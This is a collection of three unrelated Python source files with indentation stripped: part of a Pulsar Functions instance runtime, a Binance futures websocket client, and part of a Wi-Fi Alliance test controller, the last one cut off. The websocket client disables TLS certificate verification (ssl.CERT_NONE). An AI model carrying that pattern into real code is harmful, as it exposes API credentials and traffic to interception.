self.ndeserialization_exceptions[topic] += 1
def increment_successfully_processed(self, latency):
self.nsuccessfullyprocessed += 1
self.latency += latency
def increment_processed(self, processed_at):
self.nprocessed += 1
self.lastinvocationtime = processed_at
def record_user_exception(self, ex):
self.latestuserexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestuserexceptions) > 10:
self.latestuserexceptions.pop(0)
self.nuserexceptions = self.nuserexceptions + 1
def record_system_exception(self, ex):
self.latestsystemexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestsystemexceptions) > 10:
self.latestsystemexceptions.pop(0)
self.nsystemexceptions = self.nsystemexceptions + 1
def compute_latency(self):
if self.nsuccessfullyprocessed <= 0:
return 0
else:
return self.latency / self.nsuccessfullyprocessed
def update(self, object):
self.nprocessed = object.nprocessed
self.nsuccessfullyprocessed = object.nsuccessfullyprocessed
self.nuserexceptions = object.nuserexceptions
self.nsystemexceptions = object.nsystemexceptions
self.nserialization_exceptions = object.nserialization_exceptions
self.latency = object.latency
self.lastinvocationtime = object.lastinvocationtime
self.latestuserexceptions = []
self.latestsystemexceptions = []
self.ndeserialization_exceptions.clear()
self.latestuserexceptions.append(object.latestuserexceptions)
self.latestsystemexceptions.append(object.latestsystemexceptions)
self.ndeserialization_exceptions.update(object.ndeserialization_exceptions)
class PythonInstance(object):
def __init__(self, instance_id, function_id, function_version, function_details, max_buffered_tuples, expected_healthcheck_interval, user_code, pulsar_client):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
self.queue = queue.Queue(max_buffered_tuples)
self.log_topic_handler = None
if function_details.logTopic is not None and function_details.logTopic != "":
self.log_topic_handler = log.LogTopicHandler(str(function_details.logTopic), pulsar_client)
self.pulsar_client = pulsar_client
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.exeuction_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.total_stats = Stats()
self.current_stats = Stats()
self.stats = Stats()
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
self.expected_healthcheck_interval = expected_healthcheck_interval
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > self.expected_healthcheck_interval * 3:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGKILL)
sys.exit(1)
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
def run(self):
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.info("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
for topic, consumer_conf in self.instance_config.function_details.source.inputSpecs.items():
if not consumer_conf.serdeClassName:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), consumer_conf.serdeClassName)
self.input_serdes[topic] = serde_kclass()
Log.info("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
if consumer_conf.isRegexPattern:
self.consumers[topic] = self.pulsar_client.subscribe(
re.compile(str(topic)), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
else:
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client, self.user_code, self.consumers)
# Now launch a thread that does execution
self.exeuction_thread = threading.Thread(target=self.actual_execution)
self.exeuction_thread.start()
# start proccess spawner health check timer
self.last_health_check_ts = time.time()
if self.expected_healthcheck_interval > 0:
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
def actual_execution(self):
Log.info("Started Thread for executing the function")
while True:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
user_exception = False
system_exception = False
Log.debug("Got a message from topic %s" % msg.topic)
input_object = None
try:
input_object = msg.serde.deserialize(msg.message.data())
except:
self.current_stats.increment_deser_errors(msg.topic)
self.total_stats.increment_deser_errors(msg.topic)
continue
self.contextimpl.set_current_message_context(msg.message.message_id(), msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
start_time = time.time()
self.current_stats.increment_processed(int(start_time) * 1000)
self.total_stats.increment_processed(int(start_time) * 1000)
successfully_executed = False
try:
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
except Exception as e:
Log.exception("Exception while executing user method")
self.total_stats.record_user_exception(e)
self.current_stats.record_user_exception(e)
end_time = time.time()
latency = (end_time - start_time) * 1000
self.total_stats.increment_successfully_processed(latency)
self.current_stats.increment_successfully_processed(latency)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
def done_producing(self, consumer, orig_message, result, sent_message):
if result == pulsar.Result.Ok and self.auto_ack and self.atleast_once:
consumer.acknowledge(orig_message)
def process_result(self, output, msg):
if output is not None:
output_bytes = None
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
try:
output_bytes = self.output_serde.serialize(output)
except:
self.current_stats.nserialization_exceptions += 1
self.total_stats.nserialization_exceptions += 1
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64ify(msg.message.message_id().serialize())}
try:
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message), properties=props)
except Exception as e:
self.current_stats.record_system_exception(e)
self.total_stats.record_system_exception(e)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
if self.instance_config.function_details.sink.serDeClassName != None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
if self.instance_config.function_details.sink.topic != None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.info("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_max_publish_delay_ms=1,
max_pending_messages=100000)
def message_listener(self, serde, consumer, message):
item = InternalMessage(message, consumer.topic(), serde, consumer)
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.update(self.current_stats)
self.current_stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
# First get any user metrics
metrics = self.contextimpl.get_metrics()
# Now add system metrics as well
self.add_system_metrics("__total_processed__", self.stats.nprocessed, metrics)
self.add_system_metrics("__total_successfully_processed__", self.stats.nsuccessfullyprocessed, metrics)
self.add_system_metrics("__total_system_exceptions__", self.stats.nsystemexceptions, metrics)
self.add_system_metrics("__total_user_exceptions__", self.stats.nuserexceptions, metrics)
for (topic, metric) in self.stats.ndeserialization_exceptions.items():
self.add_system_metrics("__total_deserialization_exceptions__" + topic, metric, metrics)
self.add_system_metrics("__total_serialization_exceptions__", self.stats.nserialization_exceptions, metrics)
self.add_system_metrics("__avg_latency_ms__", self.stats.compute_latency(), metrics)
return metrics
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
status.numProcessed = self.total_stats.nprocessed
status.numSuccessfullyProcessed = self.total_stats.nsuccessfullyprocessed
status.numUserExceptions = self.total_stats.nuserexceptions
status.instanceId = self.instance_config.instance_id
for ex, tm in self.total_stats.latestuserexceptions:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = self.total_stats.nsystemexceptions
for ex, tm in self.total_stats.latestsystemexceptions:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
for (topic, metric) in self.total_stats.ndeserialization_exceptions.items():
status.deserializationExceptions[topic] = metric
status.serializationExceptions = self.total_stats.nserialization_exceptions
status.averageLatency = self.total_stats.compute_latency()
status.lastInvocationTime = self.total_stats.lastinvocationtime
status.metrics.CopyFrom(self.get_metrics())
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
self.exeuction_thread.join()
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
from urllib import parse
import urllib.parse
# from binance_f.base.printtime import PrintDate
from binance_f.impl.utils.timeservice import get_current_timestamp
from binance_f.impl.utils.urlparamsbuilder import UrlParamsBuilder
from binance_f.impl.utils.apisignature import create_signature
from binance_f.exception.binanceapiexception import BinanceApiException
from binance_f.impl.utils import *
# from binance_f.base.printobject import *
from binance_f.model.constant import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connecting...")
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connection event loop down")
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
self.__thread = None
self.url = uri
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger("binance-futures")
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
def in_delay_connection(self):
return self.delay_in_second != -1
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
self.logger.warning("[Sub][" + str(self.id) + "] Reconnecting after "
+ str(self.delay_in_second) + " seconds later")
def re_connect(self):
if self.delay_in_second != 0:
self.delay_in_second -= 1
self.logger.warning("In delay connection: " + str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info("[Sub][" + str(self.id) + "] Already connected")
else:
self.__thread = threading.Thread(target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
self.logger.error("[Sub][" + str(self.id) + "] Closing normally")
def on_open(self, ws):
self.logger.info("[Sub][" + str(self.id) + "] Connected to server")
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
print('error')
exception = BinanceApiException(BinanceApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error("[Sub][" + str(self.id) + "] " + str(error_message))
def on_failure(self, error):
print('on_failure')
self.on_error("Unexpected error: " + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
json_wrapper = parse_json_from_string(message)
if json_wrapper.contain_key("status") and json_wrapper.get_string("status") != "ok":
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("err-code") and json_wrapper.get_int("err-code") != 0:
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("result") and json_wrapper.contain_key("id"):
self.__on_receive_response(json_wrapper)
else:
self.__on_receive_payload(json_wrapper)
def __on_receive_response(self, json_wrapper):
res = None
try:
res = json_wrapper.get_int("id")
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(SubscribeMessageType.RESPONSE, res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
def __on_receive_payload(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(SubscribeMessageType.PAYLOAD, res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
if self.request.auto_close:
self.close()
def __process_ping_on_trading_line(self, ping_ts):
self.send("{\"op\":\"pong\",\"ts\":" + str(ping_ts) + "}")
return
def __process_ping_on_market_line(self, ping_ts):
self.send("{\"pong\":" + str(ping_ts) + "}")
return
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error("[Sub][" + str(self.id) + "] Connection is closing due to error")
|
wts.py
|
###############################################################################
#
# Copyright (c) 2016 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###############################################################################
#!/usr/bin/env python
import argparse
from operator import itemgetter
import sys
import os
import re
import threading
from socket import *
import core.parser
import scriptinfo.scriptsource
import core.initializer
from common import *
from util.misc import Util
from core.executor import Executor
from features import display_val_result
from features.usermode import UserMode
from frontend.cli import FrontendCli, FrontendCliServer
from scriptinfo.scriptsource import TestLogFileSource
from security.filesec import ScriptsSecurity
from dbaccess import historydb
from core.symtable import TestScriptSymbolTable
from security.filelocker import ReadFileBusy
from features.validation import Validation
from netcomm.netsocket import NetCommClient
from netcomm.netsocket import NetCommServer
class UserRequestAction:
"""A thread class to handle user requests passed in through front end controller.
Attributes:
usr_in_cmd (object): The object of UserCommand class.
user_mode (object): The object of UserMode class.
is_running (boolean): The while loop stops when it is False.
req_hdl_dict (dictionary): Store the mappings of user command to its handling function
"""
def __init__(self):
self.is_running = True
self.usr_in_cmd = None
self.user_mode = UserMode()
self.req_hdl_dict = {
UserCommand.GET_DEFAULT_USER_MODE: self.get_default_user_mode,
UserCommand.GET_CURRENT_USER_MODE: self.get_curr_user_mode,
UserCommand.SET_DEFAULT_USER_MODE: self.set_default_user_mode,
UserCommand.SET_CURRENT_USER_MODE: self.set_curr_user_mode,
UserCommand.SHOW_USER_MODE: self.show_user_mode,
UserCommand.STOP_TEST_RUN: self.stop_test_run,
UserCommand.SHOW_WTS_VERSION: self.get_wts_ver
}
def user_request_dispatcher(self):
"""Dispatches user requests to different user mode request handlers.
"""
while self.is_running:
item = GlobalConfigFiles.usr_req_que.dequeue()
if item is not None:
if isinstance(item.cmd, TestExecutionCommand):
run_status = TestFlowController.get_test_flow_status()
if run_status == TestFlowController.TEST_FLOW_STATUS_RUNNING:
resp_item = item
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "Test case %s currently running, please wait or stop the test" % GlobalConfigFiles.curr_tc_name
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
self.usr_in_cmd = item.cmd
self.start_test_run(item)
#self.is_running = False
#break
elif isinstance(item.cmd, UserQueryCommand):
cmd_str = item.cmd.cmd_name
#print "**************** %s *******************" % cmd_str
if cmd_str in self.req_hdl_dict:
run_status = TestFlowController.get_test_flow_status()
if run_status == TestFlowController.TEST_FLOW_STATUS_RUNNING:
if cmd_str == UserCommand.SET_CURRENT_USER_MODE or cmd_str == UserCommand.SET_DEFAULT_USER_MODE:
resp_item = item
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "Test case %s currently running, cannot complete the request" % GlobalConfigFiles.curr_tc_name
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
continue
self.req_hdl_dict[cmd_str](item)
#if not (run_status == TestFlowController.TEST_FLOW_STATUS_RUNNING):
# self.is_running = False
# break
else:
logging.error("Unknown command - %s ###" % cmd_str)
resp_item = item
resp_item.cmd.status = UserCommand.INVALID
resp_item.cmd.err_msg = "User command not identified"
##print resp_item
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
#print "######################### in while"
pass
time.sleep(1)
def start_test_run(self, item):
"""Handles the request to start test.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
#print "*********************** start to run test ********************"
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def stop_test_run(self):
"""Handles stop test run request.
"""
self.is_running = False
def get_wts_ver(self, item=None):
"""Gets the WTS version.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = GlobalConfigFiles.VERSION
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def get_default_user_mode(self, item=None):
"""Gets the default user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
default_mode = self.user_mode.get_default_mode()
#print "*********************** get default user mode %s ********************" % default_mode
if item is not None:
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = default_mode
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
return default_mode
def get_curr_user_mode(self, item=None):
"""Gets the current user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
curr_mode = self.user_mode.get_current_mode()
#print "*********************** get current user mode %s ********************" % curr_mode
if item is not None:
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = curr_mode
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
return curr_mode
def set_default_user_mode(self, item):
"""Sets the default user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
if item.cmd.mode != "":
ret_val = self.user_mode.set_default_mode(item.cmd.mode)
if ret_val == -1:
resp_item.cmd.status = UserCommand.INVALID
resp_item.cmd.err_msg = "invalid mode, please check"
else:
resp_item.cmd.status = UserCommand.COMPLETE
else:
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "test flow controller error: parameter is empty"
#print "*********************** set default user mode done ********************"
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def set_curr_user_mode(self, item):
"""Sets the current user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
if item.cmd.mode != "":
ret_val = self.user_mode.set_current_mode(item.cmd.mode)
if ret_val == "-1":
resp_item.cmd.status = UserCommand.INVALID
resp_item.cmd.err_msg = "invalid mode, please check"
else:
resp_item.cmd.status = UserCommand.COMPLETE
else:
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "test flow controller error: parameter is empty"
#print "*********************** set current user mode done ********************"
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def show_user_mode(self, item):
"""Displays all available user modes.
Args:
item (object): The object of UserInteractQueueItem class.
"""
all_user_modes = self.user_mode.get_available_modes()
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = all_user_modes
#print "*********************** %s ********************" % all_user_modes
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def check_user_mode_permission(self, feat):
"""Checks user mode permission for a specific feature.
Args:
feat (str): The string of user mode feature.
"""
return self.user_mode.check_feature(feat)
class TestFlowController:
"""A class to control test flow including configuration and executioin.
Attributes:
capi_script_parser (object): The object of TestScriptParser class.
xml_file_parser (object): The object of XmlFileParser class.
test_mngr_initr (object): The object of TestManagerInitializer class.
usr_input_handle_thr (boolean): The user input command handling thread object.
usr_action_cls (object): The object of UserRequestAction class.
executor_inst (object): The object of Executor class.
"""
TEST_FLOW_STATUS_RUNNING = "RUNNING"
TEST_FLOW_STATUS_NOTSTART = "NOTSTART"
TEST_FLOW_STATUS_EXECUTING = "EXECUTING"
capi_script_parser = None
xml_file_parser = None
test_mngr_initr = None
usr_input_handle_thr = None
usr_action_cls = None
executor_inst = None
file_busy = None
start_time = None
@staticmethod
def reset_test_environment():
"""Resets test execution environment.
"""
TestFlowController.test_mngr_initr.test_case_mngr = None
TestFlowController.test_mngr_initr.test_script_mngr = None
TestFlowController.test_mngr_initr.test_config_info_mngr.sll = None
TestFlowController.test_mngr_initr.testbed_dev_mngr.ill = None
TestFlowController.test_mngr_initr.test_data_strm_mngr = None
TestFlowController.test_mngr_initr.test_prog_mngr = None
TestFlowController.test_mngr_initr.test_feat_mngr = None
TestFlowController.test_mngr_initr.test_configurator = None
TestFlowController.test_mngr_initr.test_config_cxt = None
TestFlowController.test_mngr_initr.test_config_service = None
core.parser.TestScriptParser.qll = None
core.parser.TestScriptParser.ill = None
TestLogFileSource.log_file_source_obj_list = []
core.parser.TestScriptParser.sub_file_call_dict = {}
TestLogFileSource.log_file_hdl_list = []
TestLogFileSource.log_file_source_obj_list = []
core.parser.test_script_sym_tab = {"ifCondBit" : True, "socktimeout" : 60, "iDNB" : 0, "testRunning" : 0, "threadCount" : 0}
core.parser.capi_cmd_ret_sym_tab = {}
@staticmethod
def start_test_execution_controller(usr_in_cmd):
"""Starts test case execution as either a group or a single case
Args:
usr_in_cmd (object): The object of UserCommand class.
"""
GlobalConfigFiles.curr_prog_name = usr_in_cmd.prog_name
if usr_in_cmd.is_group_run:
if os.path.exists(usr_in_cmd.group_file_name):
grp_files = open(usr_in_cmd.group_file_name, 'r')
for tc in grp_files:
if not tc:
break
tc = tc.strip()
usr_in_cmd.test_case_id = tc
if TestFlowController.test_mngr_initr is not None:
TestFlowController.test_mngr_initr.tc_name = tc
TestFlowController.initialize_test_environment(usr_in_cmd)
GlobalConfigFiles.curr_tc_name = tc
TestFlowController.run_test_case(usr_in_cmd)
TestFlowController.reset_test_environment()
else:
raise OSError(usr_in_cmd.group_file_name + " not exists")
else:
GlobalConfigFiles.curr_tc_name = usr_in_cmd.test_case_id
#===================================================================
# if usr_in_cmd.is_testcase_val:
# TestFlowController.initialize_test_environment(usr_in_cmd)
# TestFlowController.run_test_case(usr_in_cmd)
# TestFlowController.reset_test_environment()
# usr_in_cmd.is_testcase_val = False
#===================================================================
TestFlowController.initialize_test_environment(usr_in_cmd)
TestFlowController.run_test_case(usr_in_cmd)
TestFlowController.reset_test_environment()
@staticmethod
def initialize_test_environment(usr_in_cmd):
"""Initializes test execution environment including domain object managers.
Args:
usr_in_cmd (object): The object of UserCommand class.
"""
if TestFlowController.test_mngr_initr == None:
TestFlowController.test_mngr_initr = core.initializer.TestManagerInitializer(usr_in_cmd.prog_name, usr_in_cmd.test_case_id)
TestFlowController.test_mngr_initr.init_test_config_context(usr_in_cmd)
# gets the current user mode
TestFlowController.test_mngr_initr.test_config_cxt.user_mode = TestFlowController.usr_action_cls.get_curr_user_mode()
if TestFlowController.test_mngr_initr.test_config_cxt.user_mode != "precert":
#TestFlowController.test_mngr_initr.test_config_cxt.is_testbed_validation_set = TestFlowController.usr_action_cls.check_user_mode_permission("validation")
TestFlowController.test_mngr_initr.test_config_cxt.is_app_id_set = TestFlowController.usr_action_cls.check_user_mode_permission("app_id")
TestFlowController.test_mngr_initr.test_config_cxt.is_script_protection_set = TestFlowController.usr_action_cls.check_user_mode_permission("script_protection")
TestFlowController.test_mngr_initr.test_config_cxt.is_result_protection_set = TestFlowController.usr_action_cls.check_user_mode_permission("result_protection")
TestFlowController.test_mngr_initr.test_config_cxt.is_edit_script_flag_set = TestFlowController.usr_action_cls.check_user_mode_permission("edit_scripts")
TestFlowController.test_mngr_initr.init_test_manager()
TestFlowController.test_mngr_initr.init_testbed_device()
if TestFlowController.test_mngr_initr.test_config_cxt.is_testcase_ignored: return
TestFlowController.test_mngr_initr.init_test_case()
@staticmethod
def run_test_case(usr_in_cmd):
"""Executes a single test case
Args:
usr_in_cmd (object): The object of UserCommand class.
"""
try:
TestFlowController.prepare_log_files(usr_in_cmd)
core.parser.TestScriptParser.sub_file_call_dict["%s:%s:1" % (TestFlowController.test_mngr_initr.test_script_mngr.test_case_file, TestFlowController.test_mngr_initr.test_script_mngr.test_case_file)] = 1
test_file_source_facotry_list = TestFlowController.get_config_files_list(usr_in_cmd)
for test_file_source_facotry in test_file_source_facotry_list:
test_file_source = test_file_source_facotry.file_factory_method()
if test_file_source_facotry.file_type == "TXT":
for tc in TestFlowController.test_mngr_initr.test_prog_mngr.test_prog.tc_list:
if test_file_source_facotry.file_name == tc.tc_name:
TestFlowController.test_mngr_initr.test_config_cxt.is_test_case_file = True
#TestFlowController.print_config_files_info(test_file_source_facotry.file_name, usr_in_cmd.test_case_id)
break
TestFlowController.print_config_files_info(test_file_source_facotry.file_name, TestFlowController.test_mngr_initr.test_config_cxt.is_test_case_file)
if test_file_source_facotry.file_name == GlobalConfigFiles.dut_info_file:
TestLogFileSource.log_file_source_obj_list[0].write_log_message("Read DUT Info Function", TestLogFileSource.log_file_hdl_list[0])
if test_file_source_facotry.file_name == GlobalConfigFiles.init_config_file:
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_config_file = True
#TestFlowController.print_config_files_info(test_file_source_facotry.file_name)
if test_file_source_facotry.file_name == GlobalConfigFiles.init_cmd_file or test_file_source_facotry.file_name == GlobalConfigFiles.device_id_file:
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_command_file = True
TestFlowController.capi_script_parser = core.parser.TestScriptParserFactory.create_parser(test_file_source, TestFlowController.test_mngr_initr)
TestFlowController.test_mngr_initr.test_configurator.configure(TestFlowController.test_mngr_initr, TestFlowController.capi_script_parser)
if TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_command_file:
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_config_file = False
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_command_file = False
if test_file_source_facotry.file_type == "XML":
TestFlowController.print_config_files_info(test_file_source_facotry.file_name, TestFlowController.test_mngr_initr.test_config_cxt.is_test_case_file)
xml_file_parser = core.parser.TestScriptParserFactory.create_parser(test_file_source, TestFlowController.test_mngr_initr, True)
